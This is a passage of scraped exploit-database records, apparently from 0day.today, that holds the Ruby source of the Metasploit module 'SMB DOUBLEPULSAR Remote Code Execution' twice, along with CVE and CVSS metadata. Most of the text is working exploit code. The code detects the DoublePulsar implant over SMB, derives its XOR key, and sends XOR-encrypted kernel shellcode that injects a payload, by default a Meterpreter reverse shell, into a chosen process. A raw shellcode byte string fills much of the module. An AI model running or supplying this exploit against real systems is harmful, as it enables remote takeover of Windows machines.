calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-08] #"}, "lastseen": "2021-09-07T22:13:30", "differentElements": ["sourceData"], "edition": 10}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "b109bcf64022fba766803673f4ffd6bf", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-08T22:11:20", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-08T22:11:20", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-08T22:11:20", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n 